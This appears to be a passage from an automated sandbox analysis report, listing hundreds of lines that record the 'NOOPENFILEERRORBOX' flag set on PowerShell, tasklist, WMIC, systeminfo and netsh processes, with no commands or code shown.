              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
